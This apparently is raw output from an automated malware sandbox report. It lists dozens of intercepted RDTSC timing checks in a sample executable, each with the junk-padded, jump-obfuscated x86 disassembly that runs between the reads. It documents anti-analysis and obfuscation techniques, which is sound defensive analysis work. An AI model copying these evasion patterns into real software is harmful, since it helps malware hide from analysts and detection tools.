              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0A32 second address: 4BE001A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335931F156h 0x00000008 pushfd 0x00000009 jmp 00007F335931F152h 0x0000000e xor ecx, 0295C4A8h 0x00000014 jmp 00007F335931F14Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, esi 0x0000001f jmp 00007F335931F156h 0x00000024 pop esi 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F335931F14Eh 0x0000002c or eax, 4903F238h 0x00000032 jmp 00007F335931F14Bh 0x00000037 popfd 0x00000038 mov si, 306Fh 0x0000003c popad 0x0000003d leave 0x0000003e jmp 00007F335931F152h 0x00000043 retn 0004h 0x00000046 nop 0x00000047 sub esp, 04h 0x0000004a xor ebx, ebx 0x0000004c cmp eax, 00000000h 0x0000004f je 00007F335931F2AAh 0x00000055 mov dword ptr [esp], 0000000Dh 0x0000005c call 00007F335D12B2E1h 0x00000061 mov edi, edi 0x00000063 jmp 00007F335931F14Ch 0x00000068 xchg eax, ebp 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c mov edi, 5B243430h 0x00000071 pushad 0x00000072 popad 0x00000073 popad 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE001A second address: 4BE003F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov ax, 1D1Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F335854CBC6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE003F second address: 4BE0062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335931F151h 0x00000008 mov eax, 54A2B697h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0062 second address: 4BE0066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0066 second address: 4BE006C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE006C second address: 4BE007D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE007D second address: 4BE00A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F335931F158h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE00A1 second address: 4BE00A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE00A7 second address: 4BE00AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE00AB second address: 4BE00CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335854CBC4h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE00CC second address: 4BE00D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE00D2 second address: 4BE00D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE00D6 second address: 4BE0118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F335931F156h 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007F335931F150h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 mov dl, ch 0x0000001a mov bx, 1F1Eh 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0118 second address: 4BE011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE011C second address: 4BE0122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0122 second address: 4BE0163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F335854CBC6h 0x00000009 and cx, CD18h 0x0000000e jmp 00007F335854CBBBh 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F335854CBBCh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0163 second address: 4BE0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0172 second address: 4BE0178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0215 second address: 4BE0227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F14Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0227 second address: 4BE0278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F335854CE24h 0x00000011 pushad 0x00000012 mov ah, dl 0x00000014 popad 0x00000015 lea ecx, dword ptr [ebp-14h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushfd 0x0000001e jmp 00007F335854CBC5h 0x00000023 xor ax, F056h 0x00000028 jmp 00007F335854CBC1h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0278 second address: 4BE02DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F335931F157h 0x00000009 xor cl, FFFFFF8Eh 0x0000000c jmp 00007F335931F159h 0x00000011 popfd 0x00000012 jmp 00007F335931F150h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [ebp-14h], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F335931F157h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0384 second address: 4BE038A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE038A second address: 4BE03C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F335931F14Bh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F335931F155h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE03C0 second address: 4BE03EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [769B86D4h] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push FFFFFFFEh 0x00000016 push 7741CA08h 0x0000001b push 7738AE00h 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 push eax 0x00000027 sub esp, 0Ch 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [7743B370h] 0x00000032 xor dword ptr [ebp-08h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b mov dword ptr fs:[00000000h], eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 mov eax, dword ptr fs:[00000018h] 0x0000004a test eax, eax 0x0000004c je 00007F3358590201h 0x00000052 mov dword ptr [ebp-04h], 00000000h 0x00000059 mov edx, dword ptr [ebp+08h] 0x0000005c mov dword ptr [eax+00000BF4h], edx 0x00000062 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000069 test edx, edx 0x0000006b je 00007F335854CC59h 0x00000071 xor edx, edx 0x00000073 jmp 00007F335854CB98h 0x00000075 mov eax, edx 0x00000077 mov ecx, dword ptr [ebp-10h] 0x0000007a mov dword ptr fs:[00000000h], ecx 0x00000081 pop ecx 0x00000082 pop edi 0x00000083 pop esi 0x00000084 pop ebx 0x00000085 mov esp, ebp 0x00000087 pop ebp 0x00000088 retn 0004h 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F335854CBBDh 0x00000092 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE03EA second address: 4BE03F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE03F0 second address: 4BE03F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE03F4 second address: 4BE03F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE03F8 second address: 4BE040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov edx, 538B8708h 0x00000010 push eax 0x00000011 push edx 0x00000012 mov cx, dx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE040D second address: 4BE044E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007F33CB09D1BEh 0x0000000d jmp 00007F335931F155h 0x00000012 js 00007F335931F1BDh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F335931F153h 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE044E second address: 4BE0470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0470 second address: 4BE0483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0483 second address: 4BE0489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0489 second address: 4BE048D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE048D second address: 4BE0491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0491 second address: 4BE0512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F33CB09D148h 0x0000000e pushad 0x0000000f mov edi, 67056370h 0x00000014 push ebx 0x00000015 mov ax, A42Bh 0x00000019 pop ecx 0x0000001a popad 0x0000001b mov ebx, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f movzx esi, dx 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-2Ch] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F335931F151h 0x0000002d and si, E7A6h 0x00000032 jmp 00007F335931F151h 0x00000037 popfd 0x00000038 pushad 0x00000039 movzx esi, dx 0x0000003c mov ebx, 01FD0A2Eh 0x00000041 popad 0x00000042 popad 0x00000043 push esp 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F335931F14Ah 0x0000004d jmp 00007F335931F155h 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0512 second address: 4BE0579 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F335854CBBCh 0x00000013 jmp 00007F335854CBC5h 0x00000018 popfd 0x00000019 jmp 00007F335854CBC0h 0x0000001e popad 0x0000001f nop 0x00000020 jmp 00007F335854CBC0h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop edi 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0637 second address: 4BE063C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE063C second address: 4BD0734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F335854CBBCh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, eax 0x0000000f jmp 00007F335854CBC1h 0x00000014 test esi, esi 0x00000016 pushad 0x00000017 mov bl, ch 0x00000019 mov edi, 1856E34Ch 0x0000001e popad 0x0000001f je 00007F33CA2CAB9Dh 0x00000025 xor eax, eax 0x00000027 jmp 00007F33585262EAh 0x0000002c pop esi 0x0000002d pop edi 0x0000002e pop ebx 0x0000002f leave 0x00000030 retn 0004h 0x00000033 nop 0x00000034 sub esp, 04h 0x00000037 mov esi, eax 0x00000039 xor ebx, ebx 0x0000003b cmp esi, 00000000h 0x0000003e je 00007F335854CCF5h 0x00000044 call 00007F335C34931Dh 0x00000049 mov edi, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F335854CBBFh 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD0734 second address: 4BD073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD073A second address: 4BD073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD073E second address: 4BD0742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD0742 second address: 4BD07B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F335854CBBCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007F335854CBBEh 0x00000017 pushad 0x00000018 call 00007F335854CBC0h 0x0000001d pop eax 0x0000001e call 00007F335854CBBBh 0x00000023 pop esi 0x00000024 popad 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F335854CBBFh 0x0000002d xchg eax, ecx 0x0000002e jmp 00007F335854CBC6h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD07B8 second address: 4BD07BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD07BC second address: 4BD07C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD07C2 second address: 4BD07FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov eax, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F335931F153h 0x00000011 mov dword ptr [ebp-04h], 55534552h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F335931F155h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD07FF second address: 4BD080F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD080F second address: 4BD0813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD0824 second address: 4BD0862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 leave 0x00000006 pushad 0x00000007 call 00007F335854CBBCh 0x0000000c mov edi, eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F335854CBBDh 0x00000016 xor si, 28F6h 0x0000001b jmp 00007F335854CBC1h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0A4E second address: 4BE0A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F335931F158h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0A88 second address: 4BE0A8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0A8E second address: 4BE0AD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edx, si 0x0000000e call 00007F335931F14Ah 0x00000013 mov edi, ecx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov cx, dx 0x0000001c movsx edx, ax 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F335931F14Eh 0x00000027 cmp dword ptr [769B459Ch], 05h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0AD9 second address: 4BE0AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0AF6 second address: 4BE0B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F33CB08D03Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B17 second address: 4BE0B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B1B second address: 4BE0B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B1F second address: 4BE0B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B86 second address: 4BE0B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0B8C second address: 4BE0BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F33CA2C1B86h 0x0000000e push 76952B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [769B4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BE0BAD second address: 4BE0C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e pushfd 0x0000000f jmp 00007F335931F153h 0x00000014 xor ecx, 6E92E21Eh 0x0000001a jmp 00007F335931F159h 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [ebp-1Ch], esi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, 013DC77Eh 0x0000002c pushfd 0x0000002d jmp 00007F335931F14Fh 0x00000032 adc eax, 3C290C2Eh 0x00000038 jmp 00007F335931F159h 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0B08 second address: 4BF0B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0B0E second address: 4BF0B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0B12 second address: 4BF0B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0B16 second address: 4BF0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F335931F14Fh 0x0000000e mov ebp, esp 0x00000010 jmp 00007F335931F156h 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov ax, 483Dh 0x0000001b mov dh, ch 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F335931F154h 0x00000024 xchg eax, esi 0x00000025 jmp 00007F335931F150h 0x0000002a mov esi, dword ptr [ebp+0Ch] 0x0000002d jmp 00007F335931F150h 0x00000032 test esi, esi 0x00000034 pushad 0x00000035 call 00007F335931F14Eh 0x0000003a mov dh, al 0x0000003c pop ebx 0x0000003d popad 0x0000003e je 00007F33CB07C960h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F335931F14Bh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0BB2 second address: 4BF0BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0BB8 second address: 4BF0C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [769B459Ch], 05h 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F335931F14Fh 0x00000019 sbb ecx, 347A6AFEh 0x0000001f jmp 00007F335931F159h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F335931F150h 0x0000002b sbb al, FFFFFFF8h 0x0000002e jmp 00007F335931F14Bh 0x00000033 popfd 0x00000034 popad 0x00000035 je 00007F33CB0949C1h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F335931F150h 0x00000044 rdtsc
